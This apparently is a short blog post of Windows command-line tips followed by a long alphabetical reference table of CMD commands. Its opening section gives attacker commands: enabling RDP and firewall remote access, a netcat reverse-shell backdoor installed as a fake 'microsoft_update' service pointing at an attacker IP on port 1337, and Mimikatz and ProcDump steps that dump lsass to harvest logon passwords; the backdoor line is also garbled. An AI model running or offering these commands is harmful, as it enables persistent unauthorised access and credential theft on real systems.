Windows Command Line Kung Fu
Hi, here is my first post. I want to list some great Windows command
Enable RDP
reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
View user on group
net localgroup Users
net localgroup Administrators
search all .doc file
dir/s *.doc
Start a new CMD shell and (optionally) run a command/executable program
start cmd.exe /k notepad.exe
Netcat backdoor
sc create microsoft_update binpath=”cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe” start=
auto error= ignore/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 116.56.33.161 1337
Mimikatz
mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords“
Procdump.exe –accepteula -ma lsass.exe lsass.dmp
mimikatz.exe “sekurlsa::minidump lsass.dmp” “log” “sekurlsa::logonpasswords“
C:\temp\procdump.exe –accepteula -ma lsass.exe lsass.dmp 32 (For 32 bit system)
C:\temp\procdump.exe –accepteula -64 -ma lsass.exe lsass.dmp 64 (For 64 bit system)
List Of All Windows CMD Commands
| A | |
| ADDUSERS | Add or list users to/from a CSV file |
| ADmodcmd | Active Directory Bulk Modify |
| ARP | Address Resolution Protocol |
| ASSOC | Change file extension associations• |
| ASSOCIAT | One step file association |
| AT | Schedule a command to run at a specific time |
| ATTRIB | Change file attributes |
| B | |
| BCDBOOT | Create or repair a system partition |
| BCDEDIT | Manage Boot Configuration Data |
| BITSADMIN | Background Intelligent Transfer Service |
| BOOTCFG | Edit Windows boot settings |
| BROWSTAT | Get domain, browser and PDC info |
| C | |
| CACLS | Change file permissions |
| CALL | Call one batch program from another• |
| CERTREQ | Request certificate from a certification authority |
| CERTUTIL | Utility for certification authority (CA) files and services |
| CD | Change Directory – move to a specific Folder• |
| CHANGE | Change Terminal Server Session properties |
| CHKDSK | Check Disk – check and repair disk problems |
| CHKNTFS | Check the NTFS file system |
| CHOICE | Accept keyboard input to a batch file |
| CIPHER | Encrypt or Decrypt files/folders |
| CleanMgr | Automated cleanup of Temp files, recycle bin |
| CLIP | Copy STDIN to the Windows clipboard |
| CLS | Clear the screen• |
| CMD | Start a new CMD shell |
| CMDKEY | Manage stored usernames/passwords |
| COLOR | Change colors of the CMD window• |
| COMP | Compare the contents of two files or sets of files |
| COMPACT | Compress files or folders on an NTFS partition |
| COMPRESS | Compress one or more files |
| CONVERT | Convert a FAT drive to NTFS |
| COPY | Copy one or more files to another location• |
| Coreinfo | Show the mapping between logical & physical processors |
| CSCcmd | Client-side caching (Offline Files) |
| CSVDE | Import or Export Active Directory data |
| D | |
| DATE | Display or set the date• |
| DEFRAG | Defragment hard drive |
| DEL | Delete one or more files• |
| DELPROF | Delete user profiles |
| DELTREE | Delete a folder and all subfolders |
| DevCon | Device Manager Command Line Utility |
| DIR | Display a list of files and folders• |
| DIRQUOTA | File Server Resource Manager Disk quotas |
| DIRUSE | Display disk usage |
| DISKPART | Disk Administration |
| DISKSHADOW | Volume Shadow Copy Service |
| DISKUSE | Show the space used in folders |
| DOSKEY | Edit command line, recall commands, and create macros |
| DriverQuery | Display installed device drivers |
| DSACLs | Active Directory ACLs |
| DSAdd | Add items to active directory (user group computer) |
| DSGet | View items in active directory (user group computer) |
| DSQuery | Search for items in active directory (user group computer) |
| DSMod | Modify items in active directory (user group computer) |
| DSMove | Move an Active directory Object |
| DSRM | Remove items from Active Directory |
| E | |
| ECHO | Display message on screen• |
| ENDLOCAL | End localisation of environment changes in a batch file• |
| ERASE | Delete one or more files• |
| EVENTCREATE | Add a message to the Windows event log |
| EXIT | Quit the current script/routine and set an error level• |
| EXPAND | Uncompress CAB files |
| EXTRACT | Uncompress CAB files |
| F | |
| FC | Compare two files |
| FIND | Search for a text string in a file |
| FINDSTR | Search for strings in files |
| FOR /F | Loop command: against a set of files• |
| FOR /F | Loop command: against the results of another command• |
| FOR | Loop command: all options Files, Directory, List• |
| FORFILES | Batch process multiple files |
| FORMAT | Format a disk |
| FREEDISK | Check free disk space |
| FSUTIL | File and Volume utilities |
| FTP | File Transfer Protocol |
| FTYPE | File extension file type associations• |
| G | |
| GETMAC | Display the Media Access Control (MAC) address |
| GOTO | Direct a batch program to jump to a labelled line• |
| GPRESULT | Display Resultant Set of Policy information |
| GPUPDATE | Update Group Policy settings |
| H | |
| HELP | Online Help |
| HOSTNAME | Display the host name of the computer |
| I | |
| iCACLS | Change file and folder permissions |
| IEXPRESS | Create a self extracting ZIP file archive |
| IF | Conditionally perform a command• |
| IFMEMBER | Is the current user a member of a group |
| IPCONFIG | Configure IP |
| INUSE | Replace files that are in use by the OS |
| L | |
| LABEL | Edit a disk label |
| LODCTR | Load PerfMon performance counters |
| LOGMAN | Manage Performance Monitor logs |
| LOGOFF | Log a user off |
| LOGTIME | Log the date and time in a file |
| M | |
| MAKECAB | Create .CAB files |
| MAPISEND | Send email from the command line |
| MBSAcli | Baseline Security Analyzer |
| MEM | Display memory usage |
| MD | Create new folders• |
| MKLINK | Create a symbolic link (linkd) • |
| MODE | Configure a system device COM/LPT/CON |
| MORE | Display output, one screen at a time |
| MOUNTVOL | Manage a volume mount point |
| MOVE | Move files from one folder to another• |
| MOVEUSER | Move a user from one domain to another |
| MSG | Send a message |
| MSIEXEC | Microsoft Windows Installer |
| MSINFO32 | System Information |
| MSTSC | Terminal Server Connection (Remote Desktop Protocol) |
| N | |
| NET | Manage network resources |
| NETDOM | Domain Manager |
| NETSH | Configure Network Interfaces, Windows Firewall & Remote access |
| NBTSTAT | Display networking statistics (NetBIOS over TCP/IP) |
| NETSTAT | Display networking statistics (TCP/IP) |
| NLSINFO | Display locale information (reskit). |
| NLTEST | Network Location Test (AD) |
| NOW | Display the current Date and Time |
| NSLOOKUP | Name server lookup |
| NTBACKUP | Backup folders to tape |
| NTDSUtil | Active Directory Domain Services management |
| NTRIGHTS | Edit user account rights |
| NVSPBIND | Modify network bindings |
| O | |
| OPENFILES | Query or display open files |
| P | |
| PATH | Display or set a search path for executable files• |
| PATHPING | Trace route plus network latency and packet loss |
| PAUSE | Suspend processing of a batch file and display a message• |
| PERMS | Show permissions for a user |
| PERFMON | Performance Monitor |
| PING | Test a network connection |
| POPD | Return to a previous directory saved by PUSHD• |
| PORTQRY | Display the status of ports and services |
| POWERCFG | Configure power settings |
| Print a text file | |
| PRINTBRM | Print queue Backup/Recovery |
| PRNCNFG | Configure or rename a printer |
| PRNMNGR | Add, delete, list printers and printer connections |
| ProcDump | Monitor an application for CPU spikes |
| PROMPT | Change the command prompt• |
| PsExec | Execute process remotely |
| PsFile | Show files opened remotely |
| PsGetSid | Display the SID of a computer or a user |
| PsInfo | List information about a system |
| PsKill | Kill processes by name or process ID |
| PsList | List detailed information about processes |
| PsLoggedOn | Who’s logged on (locally or via resource sharing) |
| PsLogList | Event log records |
| PsPasswd | Change account password |
| PsPing | Measure network performance |
| PsService | View and control services |
| PsShutdown | Shutdown or reboot a computer |
| PsSuspend | Suspend processes |
| PUSHD | Save and then change the current directory• |
| Q | |
| QGREP | Search file(s) for lines that match a given pattern |
| Query Process / QPROCESS | Display processes |
| Query Session / QWinsta | Display all sessions (TS/Remote Desktop) |
| Query TermServer /QAppSrv | List all servers (TS/Remote Desktop) |
| Query User / QUSER | Display user sessions (TS/Remote Desktop) |
| R | |
| RASDIAL | Manage RAS connections |
| RASPHONE | Manage RAS connections |
| RECOVER | Recover a damaged file from a defective disk |
| REG | Registry: Read, Set, Export, Delete keys and values |
| REGEDIT | Import or export registry settings |
| REGSVR32 | Register or unregister a DLL |
| REGINI | Change Registry Permissions |
| REM | Record comments (remarks) in a batch file• |
| REN | Rename a file or files• |
| REPLACE | Replace or update one file with another |
| Reset Session | Delete a Remote Desktop Session |
| RD | Delete folder(s)• |
| RMTSHARE | Share a folder or a printer |
| ROBOCOPY | Robust File and Folder Copy |
| ROUTE | Manipulate network routing tables |
| RUN | Start | RUN commands |
| RUNAS | Execute a program under a different user account |
| RUNDLL32 | Run a DLL command (add/remove print connections) |
| S | |
| SC | Service Control |
| SCHTASKS | Schedule a command to run at a specific time |
| SET | Display, set, or remove session environment variables• |
| SETLOCAL | Control the visibility of environment variables• |
| SetSPN | Edit Service Principal Names |
| SETX | Set environment variables |
| SFC | System File Checker |
| SHARE | List or edit a file share or print share |
| ShellRunAs | Run a command under a different user account |
| SHIFT | Shift the position of batch file parameters• |
| SHORTCUT | Create a windows shortcut (.LNK file) |
| SHUTDOWN | Shutdown the computer |
| SLEEP | Wait for x seconds |
| SLMGR | Software Licensing Management (Vista/2008) |
| SORT | Sort input |
| START | Start a program, command or batch file• |
| STRINGS | Search for ANSI and UNICODE strings in binary files |
| SUBINACL | Edit file and folder Permissions, Ownership and Domain |
| SUBST | Associate a path with a drive letter |
| SYSMON | Monitor and log system activity to the Windows event log |
| SYSTEMINFO | List system configuration |
| T | |
| TAKEOWN | Take ownership of a file |
| TASKLIST | List running applications and services |
| TASKKILL | End a running process |
| TELNET | Communicate with another host using the TELNET protocol |
| TIME | Display or set the system time• |
| TIMEOUT | Delay processing of a batch file |
| TITLE | Set the window title for a CMD.EXE session• |
| TLIST | Task list with full path |
| TOUCH | Change file timestamps |
| TRACERT | Trace route to a remote host |
| TREE | Graphical display of folder structure |
| TSDISCON | Disconnect a Remote Desktop Session |
| TSKILL | End a running process |
| TSSHUTDN | Remotely shut down or reboot a terminal server |
| TYPE | Display the contents of a text file• |
| TypePerf | Write performance data to a log file |
| TZUTIL | Time Zone Utility |
| V | |
| VER | Display version information• |
| VERIFY | Verify that files have been saved• |
| VOL | Display a disk label• |
| W | |
| W32TM | Time Service |
| WAITFOR | Wait for or send a signal |
| WEVTUTIL | Clear event logs, enable/disable/query logs |
| WHERE | Locate and display files in a directory tree |
| WHOAMI | Output the current UserName and domain |
| WINDIFF | Compare the contents of two files or sets of files |
| WINRM | Windows Remote Management |
| WINRS | Windows Remote Shell |
| WMIC | WMI Commands |
| WUAUCLT | Windows Update |
| X | |
| XCACLS | Change file and folder permissions |
| XCOPY | Copy files and folders |
| :: | Comment / Remark• |
